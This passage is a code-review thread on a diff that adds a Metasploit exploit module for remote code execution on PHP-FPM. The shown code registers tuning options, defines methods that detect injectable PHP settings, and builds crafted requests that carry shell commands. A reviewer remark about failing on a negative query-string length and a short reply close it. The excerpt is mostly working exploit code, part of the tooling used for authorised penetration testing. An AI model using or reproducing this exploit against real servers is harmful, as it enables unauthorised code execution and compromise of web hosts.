modules/exploits/multi/http/php_fpm_rce.rb

```diff
@@ -0,0 +1,434 @@
+        'Notes'         => {
+          'Stability'   => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to a PHP page', '/index.php'])
+    ])
+
+    register_advanced_options([
+      OptInt.new('MinQSL', [true, 'Minimum query string length', 1500]),
+      OptInt.new('MaxQSL', [true, 'Maximum query string length', 1950]),
+      OptInt.new('QSLHint', [false, 'Query string length hint']),
+      OptInt.new('QSLDetectStep', [true, 'Query string length detect step', 5]),
+      OptInt.new('MaxQSLCandidates', [true, 'Max query string length candidates', 10]),
+      OptInt.new('MaxQSLDetectDelta', [true, 'Max query string length detection delta', 10]),
+      OptInt.new('MaxCustomHeaderLength', [true, 'Max custom header length', 256]),
+      OptInt.new('CustomHeaderLengthHint', [false, 'Custom header length hint']),
+      OptEnum.new('DetectMethod', [true, "Detection method", 'session.auto_start', self.class.detect_methods.keys]),
+      OptInt.new('OperationMaxRetries', [true, 'Maximum of operation retries', 20])
+    ])
+    @filename = rand_text_alpha(1)
+    @http_param = rand_text_alpha(1)
+  end
+
+  CHECK_COMMAND   = "which which"
+  SUCCESS_PATTERN = "/bin/which"
+
+  class DetectMethod
+    attr_reader :php_option_enable, :php_option_disable
+
+    def initialize(php_option_enable:, php_option_disable:, check_cb:)
+      @php_option_enable = php_option_enable
+      @php_option_disable = php_option_disable
+      @check_cb = check_cb
+    end
+
+    def php_option_enabled?(res)
+      !!@check_cb.call(res)
+    end
+  end
+
+  def self.detect_methods
+    {
+      'session.auto_start' => DetectMethod.new(
+        php_option_enable: 'session.auto_start=1',
+        php_option_disable: 'session.auto_start=0',
+        check_cb: ->(res) { res.get_cookies =~ /PHPSESSID=/ }
+      ),
+      'output_handler.md5' => DetectMethod.new(
+        php_option_enable:  'output_handler=md5',
+        php_option_disable: 'output_handler=NULL',
+        check_cb: ->(res) { res.body.length == 16 }
+      )
+    }
+  end
+
+  def send_crafted_request(path:, qsl: datastore['MinQSL'], customh_length: 1, cmd: '', allow_retry: true)
+    uri = URI.encode(normalize_uri(target_uri.path, path)).gsub(/([?&])/, {'?'=>'%3F', '&'=>'%26'})
+    qsl_delta = uri.length - path.length - URI.encode(target_uri.path).length
+    if qsl_delta.odd?
+      fail_with Failure::Unknown, "Got odd qslDelta, that means the URL encoding gone wrong: path=#{path}, qsl_delta=#{qsl_delta}"
+    end
+    prefix = cmd.empty? ? '' : "#{@http_param}=#{URI.encode(cmd)}%26"
+    qsl_prime = qsl - qsl_delta/2 - prefix.length
+    if qsl_prime < 0
+      fail_with Failure::Unknown, "QSL value too small to fit the command: QSL=#{qsl}, qsl_delta=#{qsl_delta}, prefix (size=#{prefix.size})=#{prefix}"
```

Comment:
I also changed this, it was just a `vprint_error` before. If the payload is too big, `qsl_prime` will be negative and break the next statement `uri = "#{uri}?#{prefix}#{'Q'*qsl_prime}"`. So, it is better to fail here.

Reply:
How to fix this?